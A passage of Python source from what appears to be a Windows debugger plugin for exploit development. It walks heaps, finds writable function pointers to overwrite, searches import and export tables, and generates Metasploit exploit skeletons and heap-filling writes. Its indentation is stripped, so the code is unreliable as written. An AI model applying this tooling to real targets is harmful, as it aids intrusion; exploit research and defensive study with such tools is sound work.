ptrchars = len(data)
ptrbytes = ptrchars*2
datasize = ptrbytes+6
infoptr = block + ptr - 3
if ptrchars > 100:
data = data[0:100]+"..."
blockinfo = "%s 0x%x/%d bytes (Data : 0x%x/%d bytes, 0x%x/%d chars) : %s" % (ptrtype,ptrbytes+6,ptrbytes+6,ptrbytes,ptrbytes,ptrchars,ptrchars,data)
endptr = infoptr + ptrbytes + 6
elif ptr in unicodestrings:
ptrtype = "Unicode"
dataend = unicodestrings[ptr]
data = blockmem[ptr:dataend].replace("\x00","")
alldata = ""
ptrchars = len(data)
ptrbytes = ptrchars * 2
datasize = ptrbytes
if ptrchars > 100:
data = data[0:100]+"..."
blockinfo = "%s (0x%x/%d bytes, 0x%x/%d chars) : %s" % (ptrtype,ptrbytes,ptrbytes,ptrchars,ptrchars,data)
endptr = infoptr + ptrbytes + 2
elif ptr in objects:
ptrtype = "Object"
data = objects[ptr][0]
vtablename = objects[ptr][1]
datasize = 0
if vtablename in vtableCache:
datasize = vtableCache[vtablename]
alldata = data
if datasize > 0:
blockinfo = "%s (0x%x bytes): %s" % (ptrtype,datasize,data)
else:
blockinfo = "%s : %s" % (ptrtype,data)
endptr = infoptr + datasize
# calculate delta
slackspace = infoptr - previousptr
if endptr > 0 and not ptrtype=="Object":
if slackspace >= 0:
tolog = " +%04x @ %08x->%08x : %s" % (slackspace,infoptr,endptr,blockinfo)
else:
tolog = " @ %08x->%08x : %s" % (infoptr,endptr,blockinfo)
else:
if slackspace >= 0:
if endptr != infoptr:
tolog = " +%04x @ %08x->%08x : %s" % (slackspace,infoptr,endptr,blockinfo)
else:
tolog = " +%04x @ %08x : %s" % (slackspace,infoptr,blockinfo)
else:
tolog = " @ %08x : %s" % (infoptr,blockinfo)
if filterafter == "" or (filterafter != "" and filterafter in alldata):
showinlog = True # keep this for the entire block
if (filterafter != ""):
nr_filter_matches += 1
if showinlog:
if showdata:
dbg.log(tolog)
logfile_l.write(tolog,thislog_l)
previousptr = endptr
previoussize = datasize
# save vtableCache again
if filterafter != "":
tolog = "Nr of filter matches: %d" % nr_filter_matches
if showdata:
dbg.log("")
dbg.log(tolog)
logfile_l.write("",thislog_l)
logfile_l.write(tolog,thislog_l)
dbg.addKnowledge("vtableCache",vtableCache)
if searchtype in ["segments","all","chunks"] or "stat" in args:
segments = getSegmentsForHeap(heapbase)
dbg.log("Segment List for heap 0x%08x:" % (heapbase))
dbg.log("---------------------------------")
sortedsegments = []
for seg in segments:
sortedsegments.append(seg)
if not win7mode:
sortedsegments.sort()
vablocks = []
# VirtualAllocdBlocks
vachunks = mHeap.getVirtualAllocdBlocks()
infoblocks = {}
infoblocks["segments"] = sortedsegments
if searchtype in ["all","chunks"]:
infoblocks["virtualallocdblocks"] = [vachunks]
for infotype in infoblocks:
heapdata = infoblocks[infotype]
for thisdata in heapdata:
tolog = ""
if infotype == "segments":
# 0 : segmentstart
# 1 : segmentend
# 2 : firstentry
# 3 : lastentry
seg = thisdata
segstart = segments[seg][0]
segend = segments[seg][1]
segsize = segend-segstart
FirstEntry = segments[seg][2]
LastValidEntry = segments[seg][3]
tolog = "Segment 0x%08x - 0x%08x (FirstEntry: 0x%08x - LastValidEntry: 0x%08x): 0x%08x bytes" % (segstart,segend,FirstEntry,LastValidEntry, segsize)
if infotype == "virtualallocdblocks":
vablocks = heapdata
tolog = "Heap : 0x%08x%s : VirtualAllocdBlocks : %d " % (heapbase,heapbase_extra,len(vachunks))
#dbg.log("")
dbg.log(tolog)
if searchtype == "chunks" or "stat" in args:
try:
logfile_b.write("Heap: 0x%08x%s" % (heapbase,heapbase_extra),thislog_b)
#logfile_b.write("",thislog_b)
logfile_b.write(tolog,thislog_b)
except:
pass
if infotype == "segments":
datablocks = walkSegment(FirstEntry,LastValidEntry,heapbase)
else:
datablocks = heapdata[0]
tolog = " Nr of chunks : %d " % len(datablocks)
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
if len(datablocks) > 0:
tolog = " _HEAP_ENTRY psize size unused UserPtr UserSize"
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
sortedblocks = []
for block in datablocks:
sortedblocks.append(block)
sortedblocks.sort()
nextblock = 0
segstatinfo = {}
for block in sortedblocks:
showinlog = False
thischunk = datablocks[block]
unused = thischunk.unused
headersize = thischunk.headersize
flagtxt = getHeapFlag(thischunk.flag)
if not infotype == "virtualallocdblocks" and "virtallocd" in flagtxt.lower():
flagtxt += " (LFH)"
flagtxt = flagtxt.replace("Virtallocd","Internal")
userptr = block + headersize
psize = thischunk.prevsize * 8
blocksize = thischunk.size * 8
selfsize = blocksize
usersize = selfsize - unused
usersize = blocksize - unused
extratxt = ""
if infotype == "virtualallocdblocks":
nextblock = thischunk.flink
extratxt = " (0x%x bytes committed)" % (thischunk.commitsize * 8)
else:
nextblock = block + blocksize
if not "stat" in args:
tolog = " %08x %05x %05x %05x %08x %08x (%d) (%s) %s" % (block,psize,selfsize,unused,block+headersize,usersize,usersize,flagtxt,extratxt)
dbg.log(tolog)
logfile_b.write(tolog,thislog_b)
else:
if not usersize in segstatinfo:
segstatinfo[usersize] = 1
else:
segstatinfo[usersize] += 1
if nextblock > 0 and nextblock < LastValidEntry:
if not "stat" in args:
nextblock -= headersize
restbytes = LastValidEntry - nextblock
tolog = " 0x%08x - 0x%08x (end of segment) : 0x%x (%d) uncommitted bytes" % (nextblock,LastValidEntry,restbytes,restbytes)
dbg.log(tolog)
logfile_b.write(tolog,thislog_b)
if "stat" in args:
statinfo[segstart] = segstatinfo
# show statistics
orderedsizes = []
totalalloc = 0
for thissize in segstatinfo:
orderedsizes.append(thissize)
totalalloc += segstatinfo[thissize]
orderedsizes.sort(reverse=True)
tolog = " Segment Statistics:"
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
for thissize in orderedsizes:
nrblocks = segstatinfo[thissize]
percentage = (float(nrblocks) / float(totalalloc)) * 100
tolog = " Size : 0x%x (%d) : %d chunks (%.2f %%)" % (thissize,thissize,nrblocks,percentage)
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
tolog = " Total chunks : %d" % totalalloc
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
tolog = ""
try:
logfile_b.write(tolog,thislog_b)
except:
pass
dbg.log("")
dbg.log("")
if "stat" in args and len(statinfo) > 0:
tolog = "Global statistics"
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
globalstats = {}
allalloc = 0
for seginfo in statinfo:
segmentstats = statinfo[seginfo]
for size in segmentstats:
allalloc += segmentstats[size]
if not size in globalstats:
globalstats[size] = segmentstats[size]
else:
globalstats[size] += segmentstats[size]
orderedstats = []
for size in globalstats:
orderedstats.append(size)
orderedstats.sort(reverse=True)
for thissize in orderedstats:
nrblocks = globalstats[thissize]
percentage = (float(nrblocks) / float(allalloc)) * 100
tolog = " Size : 0x%x (%d) : %d chunks (%.2f %%)" % (thissize,thissize,nrblocks,percentage)
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
tolog = " Total chunks : %d" % allalloc
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
#dbg.log("%s" % "*" * 90)
return
def procGetIAT(args):
return procGetxAT(args,"iat")
def procGetEAT(args):
return procGetxAT(args,"eat")
def procFwptr(args):
modulecriteria = {}
criteria = {}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
modulestosearch = getModulesToQuery(modulecriteria)
allpages = dbg.getMemoryPages()
orderedpages = []
for page in allpages.keys():
orderedpages.append(page)
orderedpages.sort()
pagestoquery = {}
fwptrs = {}
objwptr = MnLog("wptr.txt")
wptrfile = objwptr.reset()
setbps = False
dopatch = False
dofreelist = False
if "bp" in args:
setbps = True
if "patch" in args:
dopatch = True
if "freelist" in args:
dofreelist = True
chunksize = 0
offset = 0
if "chunksize" in args:
if type(args["chunksize"]).__name__.lower() != "bool":
try:
if str(args["chunksize"]).lower().startswith("0x"):
chunksize = int(args["chunksize"],16)
else:
chunksize = int(args["chunksize"])
except:
chunksize = 0
if chunksize == 0 or chunksize > 0xffff:
dbg.log("[!] Invalid chunksize specified")
if chunksize > 0xffff:
dbg.log("[!] Chunksize must be <= 0xffff")
chunksize == 0
return
else:
dbg.log("[+] Will filter on chunksize 0x%0x" % chunksize )
if dofreelist:
if "offset" in args:
if type(args["offset"]).__name__.lower() != "bool":
try:
if str(args["offset"]).lower().startswith("0x"):
offset = int(args["offset"],16)
else:
offset = int(args["offset"])
except:
offset = 0
if offset == 0:
dbg.log("[!] Invalid offset specified")
else:
dbg.log("[+] Will add 0x%0x bytes between flink/blink and fwptr" % offset )
if not silent:
if setbps:
dbg.log("[+] Will set breakpoints on found CALL/JMP")
if dopatch:
dbg.log("[+] Will patch target for CALL/JMP with 0x41414141")
dbg.log("[+] Extracting .text/.code sections from %d modules" % len(modulestosearch))
dbg.updateLog()
if len(modulestosearch) > 0:
for thismodule in modulestosearch:
# find text section
for thispage in orderedpages:
page = allpages[thispage]
pagestart = page.getBaseAddress()
pagesize = page.getSize()
ptr = MnPointer(pagestart)
mod = ""
sectionname = ""
try:
mod = ptr.belongsTo()
if mod == thismodule:
sectionname = page.getSection()
if sectionname == ".text" or sectionname == ".code":
pagestoquery[mod] = [pagestart,pagestart+pagesize]
break
except:
pass
if len(pagestoquery) > 0:
if not silent:
dbg.log("[+] Analysing .text/.code sections")
dbg.updateLog()
for modname in pagestoquery:
tmodcnt = 0
nr_sizematch = 0
pagestart = pagestoquery[modname][0]
pageend = pagestoquery[modname][1]
if not silent:
dbg.log(" - Carving through %s (0x%08x - 0x%08x)" % (modname,pagestart,pageend))
dbg.updateLog()
loc = pagestart
while loc < pageend:
try:
thisinstr = dbg.disasm(loc)
instrbytes = thisinstr.getDump()
if thisinstr.isJmp() or thisinstr.isCall():
# check if it's reading a pointer from somewhere
instrtext = getDisasmInstruction(thisinstr)
opcodepart = instrbytes.upper()[0:4]
if opcodepart == "FF15" or opcodepart == "FF25":
if "[" in instrtext and "]" in instrtext:
parts1 = instrtext.split("[")
if len(parts1) > 1:
parts2 = parts1[1].split("]")
addy = parts2[0]
# get the actual value and check if it's writeable
if "(" in addy and ")" in addy:
parts1 = addy.split("(")
parts2 = parts1[1].split(")")
addy = parts2[0]
if isHexValue(addy):
addyval = hexStrToInt(addy)
access = getPointerAccess(addyval)
if "WRITE" in access:
if meetsCriteria(addyval,criteria):
savetolog = False
sizeinfo = ""
if chunksize == 0:
savetolog = True
else:
# check if this location could acts as a heap chunk for a certain size
# the size field would be placed at the curren location - 8 bytes
# and is 2 bytes large
sizeval = 0
if not dofreelist:
sizeval = struct.unpack('<H',dbg.readMemory(addyval-8,2))[0]
if sizeval >= chunksize:
savetolog = True
nr_sizematch += 1
sizeinfo = " Chunksize: %d (0x%02x) - " % ((sizeval*8),(sizeval*8))
else:
sizeval = struct.unpack('<H',dbg.readMemory(addyval-8-offset,2))[0]
#
flink = struct.unpack('<L',dbg.readMemory(addyval-offset,4))[0]
blink = struct.unpack('<L',dbg.readMemory(addyval+4-offset,4))[0]
aflink = getPointerAccess(flink)
ablink = getPointerAccess(blink)
if "READ" in aflink and "READ" in ablink:
extr = ""
if sizeval == chunksize or sizeval == chunksize + 1:
extr = " **size match**"
nr_sizematch += 1
sizeinfo = " Chunksize: %d (0x%02x)%s, UserPtr 0x%08x, Flink 0x%08x, Blink 0x%08x - " % ((sizeval*8),(sizeval*8),extr,addyval-offset,flink,blink)
savetolog = True
if savetolog:
fwptrs[loc] = addyval
tmodcnt += 1
ptrx = MnPointer(addyval)
mod = ptrx.belongsTo()
tofile = "0x%08x : 0x%08x gets called from %s at 0x%08x (%s) - %s%s" % (addyval,addyval,mod,loc,instrtext,sizeinfo,ptrx.__str__())
objwptr.write(tofile,wptrfile)
if setbps:
dbg.setBreakpoint(loc)
if dopatch:
dbg.writeLong(addyval,0x41414141)
if len(instrbytes) > 0:
loc = loc + len(instrbytes)/2
else:
loc = loc + 1
except:
loc = loc + 1
if not silent:
dbg.log(" Found %d pointers" % tmodcnt)
if chunksize > 0:
dbg.log(" %d pointers with size match" % nr_sizematch)
return
def procGetxAT(args,mode):
keywords = []
keywordstring = ""
modulecriteria = {}
criteria = {}
thisxat = {}
entriesfound = 0
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
keywordstring = args["s"].replace("'","").replace('"','')
keywords = keywordstring.split(",")
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
modulestosearch = getModulesToQuery(modulecriteria)
if not silent:
dbg.log("[+] Querying %d modules" % len(modulestosearch))
if len(modulestosearch) > 0:
xatfilename="%ssearch.txt" % mode
objxatfilename = MnLog(xatfilename)
xatfile = objxatfilename.reset()
for thismodule in modulestosearch:
thismod = MnModule(thismodule)
if mode == "iat":
thisxat = thismod.getIAT()
else:
thisxat = thismod.getEAT()
thismodule = thismod.getShortName()
for thisfunc in thisxat:
thisfuncname = thisxat[thisfunc].lower()
origfuncname = thisfuncname
firstindex = thisfuncname.find(".")
if firstindex > 0:
thisfuncname = thisfuncname[firstindex+1:len(thisfuncname)]
addtolist = False
iatptr_modname = ""
modinfohr = ""
theptr = 0
if mode == "iat":
theptr = struct.unpack('<L',dbg.readMemory(thisfunc,4))[0]
ptrx = MnPointer(theptr)
iatptr_modname = ptrx.belongsTo()
if not iatptr_modname == "" and "." in iatptr_modname:
iatptr_modparts = iatptr_modname.split(".")
iatptr_modname = iatptr_modparts[0]
if not "." in origfuncname and iatptr_modname != "" and not "!" in origfuncname:
origfuncname = iatptr_modname.lower() + "." + origfuncname
thisfuncname = origfuncname
if "!" in origfuncname:
oparts = origfuncname.split("!")
origfuncname = iatptr_modname + "." + oparts[1]
thisfuncname = origfuncname
try:
ModObj = MnModule(iatptr_modname)
modinfohr = " - %s" % (ModObj.__str__())
except:
modinfohr = ""
pass
if len(keywords) > 0:
for keyword in keywords:
keyword = keyword.lower().strip()
if ((keyword.startswith("*") and keyword.endswith("*")) or keyword.find("*") < 0):
keyword = keyword.replace("*","")
if thisfuncname.find(keyword) > -1:
addtolist = True
break
if keyword.startswith("*") and not keyword.endswith("*"):
keyword = keyword.replace("*","")
if thisfuncname.endswith(keyword):
addtolist = True
break
if keyword.endswith("*") and not keyword.startswith("*"):
keyword = keyword.replace("*","")
if thisfuncname.startswith(keyword):
addtolist = True
break
else:
addtolist = True
if addtolist:
entriesfound += 1
# add info about the module
if mode == "iat":
thedelta = thisfunc - thismod.moduleBase
logentry = "At 0x%s in %s (base + 0x%s) : 0x%s (ptr to %s) %s" % (toHex(thisfunc),thismodule.lower(),toHex(thedelta),toHex(theptr),origfuncname,modinfohr)
else:
thedelta = thisfunc - thismod.moduleBase
logentry = "0x%08x : %s!%s (0x%08x+0x%08x)" % (thisfunc,thismodule.lower(),origfuncname,thismod.moduleBase,thedelta)
dbg.log(logentry,address = thisfunc)
objxatfilename.write(logentry,xatfile)
if not silent:
dbg.log("")
dbg.log("%d entries found" % entriesfound)
return
#-----Metasploit module skeleton-----#
def procSkeleton(args):
cyclicsize = 5000
if "c" in args:
if type(args["c"]).__name__.lower() != "bool":
try:
cyclicsize = int(args["c"])
except:
cyclicsize = 5000
exploittype = ""
skeletonarg = ""
usecliargs = False
validstypes ={}
validstypes["tcpclient"] = "network client (tcp)"
validstypes["udpclient"] = "network client (udp)"
validstypes["fileformat"] = "fileformat"
exploittypes = [ "fileformat","network client (tcp)","network client (udp)" ]
errorfound = False
if __DEBUGGERAPP__ == "WinDBG" or __DEBUGGERAPP__ == 'x64dbg' or "t" in args:
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
skeltype = args["t"].lower()
skelparts = skeltype.split(":")
if skelparts[0] in validstypes:
exploittype = validstypes[skelparts[0]]
if len(skelparts) > 1:
skeletonarg = skelparts[1]
else:
errorfound = True
usecliargs = True
else:
errorfound = True
else:
errorfound = True
else:
errorfound = True
# ask for type of module
else:
dbg.log(" ** Please select a skeleton exploit type from the dropdown list **",highlight=1)
exploittype = dbg.comboBox("Select msf exploit skeleton to build :", exploittypes).lower().strip()
if errorfound:
dbg.log(" ** Please specify a valid skeleton type and argument **",highlight=1)
dbg.log(" Valid types are : tcpclient:argument, udpclient:argument, fileformat:argument")
dbg.log(" Example : skeleton for a pdf file format exploit: -t fileformat:pdf")
dbg.log(" skeleton for tcp client against port 123: -t tcpclient:123")
return
if not exploittype in exploittypes:
dbg.log("Boo - invalid exploit type, try again !",highlight=1)
return
portnr = 0
extension = ""
if exploittype.find("network") > -1:
if usecliargs:
portnr = skeletonarg
else:
portnr = dbg.inputBox("Remote port number : ")
try:
portnr = int(portnr)
except:
portnr = 0
if exploittype.find("fileformat") > -1:
if usecliargs:
extension = skeletonarg
else:
extension = dbg.inputBox("File extension :")
extension = extension.replace("'","").replace('"',"").replace("\n","").replace("\r","")
if not extension.startswith("."):
extension = "." + extension
exploitfilename="msfskeleton.rb"
objexploitfile = MnLog(exploitfilename)
global ignoremodules
global noheader
noheader = True
ignoremodules = True
exploitfile = objexploitfile.reset()
ignoremodules = False
noheader = False
modulecriteria = {}
criteria = {}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
badchars = ""
if "badchars" in criteria:
badchars = criteria["badchars"]
if "nonull" in criteria:
if not '\x00' in badchars:
badchars += '\x00'
skeletonheader,skeletoninit,skeletoninit2 = getSkeletonHeader(exploittype,portnr,extension,"",badchars)
targetstr = " 'Targets' =>\n"
targetstr += " [\n"
targetstr += " [ '<fill in the OS/app version here>',\n"
targetstr += " {\n"
targetstr += " 'Ret' => 0x00000000,\n"
targetstr += " 'Offset' => 0\n"
targetstr += " }\n"
targetstr += " ],\n"
targetstr += " ],\n"
exploitstr = " def exploit\n\n"
if exploittype.find("network") > -1:
if exploittype.find("tcp") > -1:
exploitstr += "\n connect\n\n"
elif exploittype.find("udp") > -1:
exploitstr += "\n connect_udp\n\n"
exploitstr += " buffer = Rex::Text.pattern_create(" + str(cyclicsize) + ")\n"
if exploittype.find("network") > -1:
exploitstr += "\n print_status(\"Trying target #{target.name}...\")\n"
if exploittype.find("tcp") > -1:
exploitstr += " sock.put(buffer)\n"
exploitstr += "\n handler\n"
elif exploittype.find("udp") > -1:
exploitstr += " udp_sock.put(buffer)\n"
exploitstr += "\n handler(udp_sock)\n"
if exploittype == "fileformat":
exploitstr += "\n file_create(buffer)\n\n"
if exploittype.find("network") > -1:
exploitstr += " disconnect\n\n"
exploitstr += " end\n"
objexploitfile.write(skeletonheader+"\n",exploitfile)
objexploitfile.write(skeletoninit+"\n",exploitfile)
objexploitfile.write(targetstr,exploitfile)
objexploitfile.write(skeletoninit2,exploitfile)
objexploitfile.write(exploitstr,exploitfile)
objexploitfile.write("end",exploitfile)
return
def procFillChunk(args):
reference = ""
fillchar = "A"
allregs = dbg.getRegs()
origreference = ""
deref = False
refreg = ""
offset = 0
signstuff = 1
customsize = 0
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
sizearg = args["s"]
if sizearg.lower().startswith("0x"):
sizearg = sizearg.lower().replace("0x","")
customsize = int(sizearg,16)
else:
customsize = int(sizearg)
if "r" in args:
if type(args["r"]).__name__.lower() != "bool":
# break into pieces
reference = args["r"].upper()
origreference = reference
if reference.find("[") > -1 and reference.find("]") > -1:
refregtmp = reference.replace("[","").replace("]","").replace(" ","")
if reference.find("+") > -1 or reference.find("-") > -1:
# deref with offset
refregtmpparts = []
if reference.find("+") > -1:
refregtmpparts = refregtmp.split("+")
signstuff = 1
if reference.find("-") > -1:
refregtmpparts = refregtmp.split("-")
signstuff = -1
if len(refregtmpparts) > 1:
offset = int(refregtmpparts[1].replace("0X",""),16) * signstuff
deref = True
refreg = refregtmpparts[0]
if not refreg in allregs:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
else:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
else:
# only deref
refreg = refregtmp
deref = True
else:
# no deref, maybe offset
if reference.find("+") > -1 or reference.find("-") > -1:
# deref with offset
refregtmpparts = []
refregtmp = reference.replace(" ","")
if reference.find("+") > -1:
refregtmpparts = refregtmp.split("+")
signstuff = 1
if reference.find("-") > -1:
refregtmpparts = refregtmp.split("-")
signstuff = -1
if len(refregtmpparts) > 1:
offset = int(refregtmpparts[1].replace("0X",""),16) * signstuff
refreg = refregtmpparts[0]
if not refreg in allregs:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
else:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
else:
# only deref
refregtmp = reference.replace(" ","")
refreg = refregtmp
deref = False
else:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
else:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
if not refreg in allregs:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
dbg.log("Ref : %s" % refreg)
dbg.log("Offset : %d (0x%s)" % (offset,toHex(int(str(offset).replace("-","")))))
dbg.log("Deref ? : %s" % deref)
if "b" in args:
if type(args["b"]).__name__.lower() != "bool":
if args["b"].find("\\x") > -1:
fillchar = hex2bin(args["b"])[0]
else:
fillchar = args["b"][0]
# see if we can read the reference
refvalue = 0
if deref:
refref = 0
try:
refref = allregs[refreg]+offset
except:
dbg.log("** Unable to read from %s (0x%08x)" % (origreference,allregs[refreg]+offset))
try:
refvalue = struct.unpack('<L',dbg.readMemory(refref,4))[0]
except:
dbg.log("** Unable to read from %s (0x%08x) -> 0x%08x" % (origreference,allregs[reference]+offset,refref))
return
else:
try:
refvalue = allregs[refreg]+offset
except:
dbg.log("** Unable to read from %s (0x%08x)" % (reference,allregs[refreg]+offset))
dbg.log("Reference : %s: 0x%08x" % (origreference,refvalue))
dbg.log("Fill char : \\x%s" % bin2hex(fillchar))
cmd2run = "!heap -p -a 0x%08x" % refvalue
output = dbg.nativeCommand(cmd2run)
outputlines = output.split("\n")
heapinfo = ""
for line in outputlines:
if line.find("[") > -1 and line.find("]") > -1 and line.find("(") > -1 and line.find(")") > -1:
heapinfo = line
break
if heapinfo == "":
dbg.log("Address is not part of a heap chunk")
if customsize > 0:
dbg.log("Filling memory location starting at 0x%08x with \\x%s" % (refvalue,bin2hex(fillchar)))
dbg.log("Number of bytes to write : %d (0x%08x)" % (customsize,customsize))
data = fillchar * customsize
dbg.writeMemory(refvalue,data)
dbg.log("Done")
else:
dbg.log("Please specify a custom size with -s to fill up the memory location anyway")
else:
infofields = []
cnt = 0
charseen = False
thisfield = ""
while cnt < len(heapinfo):
if heapinfo[cnt] == " " and charseen and thisfield != "":
infofields.append(thisfield)
thisfield = ""
else:
if not heapinfo[cnt] == " ":
thisfield += heapinfo[cnt]
charseen = True
cnt += 1
if thisfield != "":
infofields.append(thisfield)
if len(infofields) > 7:
chunkptr = hexStrToInt(infofields[0])
userptr = hexStrToInt(infofields[4])
size = hexStrToInt(infofields[5])
dbg.log("Heap chunk found at 0x%08x, size 0x%08x (%d) bytes" % (chunkptr,size,size))
dbg.log("Filling chunk with \\x%s, starting at 0x%08x" % (bin2hex(fillchar),userptr))
data = fillchar * size
dbg.writeMemory(userptr,data)
dbg.log("Done")
return
def procInfoDump(args):
allpages = dbg.getMemoryPages()
filename = "infodump.xml"
xmldata = '<info>\n'
xmldata += "<modules>\n"
populateModuleInfo()
modulestoquery=[]
for thismodule,modproperties in g_modules.iteritems():
xmldata += " <module name='%s'>\n" % thismodule
thisbase = getModuleProperty(thismodule,"base")
thissize = getModuleProperty(thismodule,"size")
xmldata += " <base>0x%08x</base>\n" % thisbase
xmldata += " <size>0x%08x</size>\n" % thissize
xmldata += " </module>\n"
xmldata += "</modules>\n"
orderedpages = []
for tpage in allpages.keys():
orderedpages.append(tpage)
orderedpages.sort()
if len(orderedpages) > 0:
xmldata += "<pages>\n"
# first dump module info to file
objfile = MnLog(filename)
infofile = objfile.reset(clear=True,showheader=False)
f = open(infofile,"wb")
for line in xmldata.split("\n"):
if line != "":
f.write(line + "\n")
tolog = "Dumping the following pages to file:"
dbg.log(tolog)
tolog = "Start End Size ACL"
dbg.log(tolog)
for thispage in orderedpages:
page = allpages[thispage]
pagestart = page.getBaseAddress()
pagesize = page.getSize()
ptr = MnPointer(pagestart)
mod = ""
sectionname = ""
ismod = False
isstack = False
isheap = False
try:
mod = ptr.belongsTo()
if mod != "":
ismod = True
except:
mod = ""
if not ismod:
if ptr.isOnStack():
isstack = True
if not ismod and not isstack:
if ptr.isInHeap():
isheap = True
if not ismod and not isstack and not isheap:
acl = page.getAccess(human=True)
if not "NOACCESS" in acl:
tolog = "0x%08x - 0x%08x (0x%08x) %s" % (pagestart,pagestart + pagesize,pagesize,acl)
dbg.log(tolog)
# add page contents to xml
thispage = dbg.readMemory(pagestart,pagesize)
f.write(" <page start=\"0x%08x\">\n" % pagestart)
f.write(" <size>0x%08x</size>\n" % pagesize)
f.write(" <acl>%s</acl>\n" % acl)
f.write(" <contents>")
memcontents = ""
for thisbyte in thispage:
memcontents += bin2hex(thisbyte)
f.write(memcontents)
f.write("</contents>\n")
f.write(" </page>\n")
f.write("</pages>\n")
f.write("</info>")
dbg.log("")
f.close()
dbg.log("Done")
return
def procPEB(args):
"""
Show the address of the PEB
"""
pebaddy = dbg.getPEBAddress()
dbg.log("PEB is located at 0x%08x" % pebaddy,address=pebaddy)
return
def procTEB(args):
"""
Show the address of the TEB for the current thread
"""
tebaddy = dbg.getCurrentTEBAddress()
dbg.log("TEB is located at 0x%08x" % tebaddy,address=tebaddy)
return
def procPageACL(args):
global silent
silent = True
findaddy = 0
if "a" in args:
findaddy,addyok = getAddyArg(args["a"])
if not addyok:
dbg.log("%s is an invalid address" % args["a"], highlight=1)
return
if findaddy > 0:
dbg.log("Displaying page information around address 0x%08x" % findaddy)
allpages = dbg.getMemoryPages()
dbg.log("Total of %d pages : "% len(allpages))
filename="pageacl.txt"
orderedpages = []
for tpage in allpages.keys():
orderedpages.append(tpage)
orderedpages.sort()
# find indexes to show in case we have specified an address
toshow = []
previouspage = 0
nextpage = 0
pagefound = False
if findaddy > 0:
for thispage in orderedpages:
page = allpages[thispage]
pagestart = page.getBaseAddress()
pagesize = page.getSize()
pageend = pagestart + pagesize
if findaddy >= pagestart and findaddy < pageend:
toshow.append(thispage)
pagefound = True
if pagefound and previouspage > 0:
if not previouspage in toshow:
toshow.append(previouspage)
if not thispage in toshow:
toshow.append(thispage) # nextpage
break
previouspage = thispage
if len(toshow) > 0:
toshow.sort()
orderedpages = toshow
dbg.log("Showing %d pages" % len(orderedpages))
if len(orderedpages) > 0:
objfile = MnLog(filename)
aclfile = objfile.reset()
tolog = "Start End Size ACL"
dbg.log(tolog)
objfile.write(tolog,aclfile)
for thispage in orderedpages:
page = allpages[thispage]
pagestart = page.getBaseAddress()
pagesize = page.getSize()
ptr = MnPointer(pagestart)
mod = ""
sectionname = ""
try:
mod = ptr.belongsTo()
if not mod == "":
mod = "(" + mod + ")"
sectionname = page.getSection()
except:
#print traceback.format_exc()
pass
if mod == "":
if ptr.isOnStack():
mod = "(Stack)"
elif ptr.isInHeap():
mod = "(Heap)"
acl = page.getAccess(human=True)
tolog = "0x%08x - 0x%08x (0x%08x) %s %s %s" % (pagestart,pagestart + pagesize,pagesize,acl,mod, sectionname)
objfile.write(tolog,aclfile)
dbg.log(tolog)
silent = False
return
def procMacro(args):
validcommands = ["run","set","list","del","add","show"]
validcommandfound = False
selectedcommand = ""
for command in validcommands:
if command in args:
validcommandfound = True
selectedcommand = command
break
dbg.log("")
if not validcommandfound:
dbg.log("*** Please specify a valid command. Valid commands are :")
for command in validcommands:
dbg.log(" -%s" % command)
return
macroname = ""
if "set" in args:
if type(args["set"]).__name__.lower() != "bool":
macroname = args["set"]
if "show" in args:
if type(args["show"]).__name__.lower() != "bool":
macroname = args["show"]
if "add" in args:
if type(args["add"]).__name__.lower() != "bool":
macroname = args["add"]
if "del" in args:
if type(args["del"]).__name__.lower() != "bool":
macroname = args["del"]
if "run" in args:
if type(args["run"]).__name__.lower() != "bool":
macroname = args["run"]
filename = ""
index = -1
insert = False
iamsure = False
if "index" in args:
if type(args["index"]).__name__.lower() != "bool":
index = int(args["index"])
if index < 0:
dbg.log("** Please use a positive integer as index",highlight=1)
if "file" in args:
if type(args["file"]).__name__.lower() != "bool":
filename = args["file"]
if filename != "" and index > -1:
dbg.log("** Please either provide an index or a filename, not both",highlight=1)
return
if "insert" in args:
insert = True
if "iamsure" in args:
iamsure = True
argcommand = ""
if "cmd" in args:
if type(args["cmd"]).__name__.lower() != "bool":
argcommand = args["cmd"]
dbg.setKBDB("monamacro.db")
macros = dbg.getKnowledge("macro")
if macros is None:
macros = {}
if selectedcommand == "list":
for macro in macros:
thismacro = macros[macro]
macronametxt = "Macro : '%s' : %d command(s)" % (macro,len(thismacro))
dbg.log(macronametxt)
dbg.log("")
dbg.log("Number of macros : %d" % len(macros))
if selectedcommand == "show":
if macroname != "":
if not macroname in macros:
dbg.log("** Macro %s does not exist !" % macroname)
return
else:
macro = macros[macroname]
macronametxt = "Macro : %s" % macroname
macroline = "-" * len(macronametxt)
dbg.log(macronametxt)
dbg.log(macroline)
thismacro = macro
macrolist = []
for macroid in thismacro:
macrolist.append(macroid)
macrolist.sort()
nr_of_commands = 0
for macroid in macrolist:
macrocmd = thismacro[macroid]
if macrocmd.startswith("#"):
dbg.log(" [%04d] File:%s" % (macroid,macrocmd[1:]))
else:
dbg.log(" [%04d] %s" % (macroid,macrocmd))
nr_of_commands += 1
dbg.log("")
dbg.log("Nr of commands in this macro : %d" % nr_of_commands)
else:
dbg.log("** Please specify the macroname to show !",highlight=1)
return
if selectedcommand == "run":
if macroname != "":
if not macroname in macros:
dbg.log("** Macro %s does not exist !" % macroname)
return
else:
